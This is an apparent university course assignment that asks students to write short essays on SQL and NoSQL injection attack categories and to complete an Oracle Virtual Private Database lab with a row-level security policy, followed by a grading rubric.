Week 7 Written Assignment SQl & NoSQL Injections

When an attacker is involved in injection attacks there a variety of issues that can arise.
Injection attacks can be used to bypass authentication, access, modify and delete data within a
database. This method can be used to execute commands on the operating system which allows
attacks inside of a network that sits behind a firewall.

SQL Injection targets traditional database systems involving the insertion of unauthorized or
malicious statements into the input fields of web applications / NoSQL Injection targets Big Data
platforms inserting malicious statements into Big Data components (e.g., Hive or MapReduce).
These Input Injection attacks can give an attacker unrestricted access to an entire database.
Query-level access control detects unauthorized queries injected via web applications and/or
stored procedures.
You are required to complete BOTH Part A and Part B of the assignment.

Part A

You should look at the attack types, categories, techniques and attacker desired results. Please
write short essay answers discussing the following questions:

1. Describe the In-band SQLi injection attack method. Include details on Error-
based SQLi and Union-based SQLi types. Expand on how the information gained is
helpful to the attacker.
2. Describe the Inferential SQLi (Blind SQLi) attack method. Include detail on the
Blind-boolean-based SQLi and Blind-time-based SQLi types. Why are these called blind
SQL injection attacks? Expand on how the information gained is helpful to the attacker.
Why would an attacker use these methods?
3. Describe the Out-of-band SQLi injection attack method. Expand on how the
information gained is helpful to the attacker. Why is this technique less common?
4. How does the NoSQL injection attack differ from the traditional SQL injection?

Part B

Lab Virtual Private Database (VPD) by Context

In this lab, you will implement a VPD case. It is a good idea to refer to the supplemental
materials. Please follow the specifications below.
Your tasks are as follows:

1. Connect to user SYSTEM. When you need to connect to SYSTEM schema,

please use a syntax so that it will ask the user to type the password. A typical example
will be: "connect system;"
 2. Grant "DBA" role to user DBSEC. This is the same user created on a previous
lab. If for some reason, the user was dropped, you need to recreate the user before
proceeding.

3. Grant "CREATE SESSION" and "CREATE TABLE" privileges to user

VPD_CLERK1.

4. Connect to user DBSEC/ IS481%sec. Please note that the password was from our
previous lab. If for some reason, the user was dropped or changed, you need to change it
back to the above user name and password.

5. Create "CUSTOMER" table with the following columns. Please note slight
changes in the table from previous project.

Column Name Data Type

SALES_REP_ID NUMBER(4)

CUSTOMER_ID NUMBER(8) NOT NULL

CUSTOMER_SSN VARCHAR2(9)

FIRST_NAME VARCHAR2(20)

LAST_NAME VARCHAR2(20)

ADDR_LINE VARCHAR2(80)

CITY VARCHAR2(30)

STATE VARCHAR2(30)

ZIP_CODE VARCHAR2(9)

PHONE VARCHAR2(15)

EMAIL VARCHAR2(80)

CC_NUMBER VARCHAR2(20)

CREDIT_LIMIT NUMBER

GENDER CHAR(1)

STATUS CHAR(1)

COMMENTS VARCHAR2(1024)

CTL_UPD_DTTM DATE

CTL_UPD_USER VARCHAR2(30)
 CTL_REC_STAT CHAR(1)

6. Populate the CUSTOMER table using the data in the file provided. Click here to
download the data file. (If your web browser is set at auto mode, you may have to right
click the word here and select "Save Link Target As" in order to download the script file.)

You may either put all "insert" statements within this file, or provide a link to another file.
If you use the link, please make sure your link works on your computer.

7. Query the table "CUSTOMER" to show the total number of rows from each user

8. Grant SELECT, DELETE, INSERT and UPDATE privileges on CUSTOMER

table to user VPD_CLERK1

9. Create a policy function, named "DBSEC_ROW_OWNER_FUNCTION" so that

only the data that belong to the current user will be selected. In other words, you need to
generate a predicate "CTL_UPD_USER=USER." You may refer to the supplement
material on this week for a sample code. Please note the owner of the table (DBSEC) has
to be able to access its own table. (20 points) (Please note the double quotation mark (")
is not a part of the specification.)

10. Add the policy using DBMS_RLS.ADD_POLICY function. The policy will be
named as "MY_OWNER_POLICY."

11. Connect to VPD_CLERK1/ Nancy#481.

12. Query the "CUSTOMER" table to show the total number of rows from each user.
If everything is successful, you will see only one row.

Tip:

It is important to make sure that you are connected to user DBSEC/ IS481%sec, before
creating the policy function and running DBMS_RLS.ADD_POLICY. Otherwise, you will
see ORA-28110.

Submission Requirement:

The SQL script files will be required and the screen capture of the lab completed steps.

Grading Rubric

Criteria Excellent Competent Needs Total

 Improvement Points
Possible

In-band SQLi (10 -9 points) ( 8- 4 points) (3-0 points) 10

Provides Insufficiently
Meets explanation provides
Competent with examples explanation or
criteria and of the in-band examples of the
substantiated technique and in-band
with examples categories technique and
of the in-band categories
technique and
categories

Inferential (10 -9 points) ( 8- 4 points) (3-0 points) 10

SQLi Provides Insufficiently
Meets explanation provides
Competent with examples explanation or
criteria and of the examples of the
substantiated Inferential Inferential
with examples SQLi SQLi technique
of the technique and and categories
Inferential categories
SQLi
technique and
categories

Out-of-band (10 -9 points) ( 8- 4 points) (3-0 points) 10

SQLi Provides Insufficiently
Meets explanation provides
Competent with examples explanation or
criteria and of the Out-of- examples of the
substantiated band SQLi Out-of-band
with examples technique and SQLi technique
of the Out-of- categories and categories
band SQLi
technique and
categories

NoSQLi vs (10 -9 points) ( 8- 4 points) (3-0 points) 10

SQLi Provides Insufficiently
Meets comparison of provides
Competent the NoSQLi vs comparison of
criteria and
 substantiated SQLi the NoSQLi vs
with examples techniques SQLi
in the techniques
comparison of
NoSQLi vs
SQLi
techniques

Lab Creation (30-27 points) (26-15 points) (15-0 points) 30

of Table and Submission Submission Submission
Population includes both includes both does not
the script file script file and include the both
and screen screen captures script file and
capture of the of the creation screen capture
creation the of the tables of the creation
tables and and population of the tables
population but contains and population
errors. or contains
errors

Lab Add (30-27 points) (26-15 points) (15-0 points) 30

policy and test Submission Submission Submission
includes both includes both does not
the script file the script file includes both
and screen and screen the script file
capture of the capture of the and screen
add policy and add policy and captures of the
test test but has add policy and
errors test or contains
errors.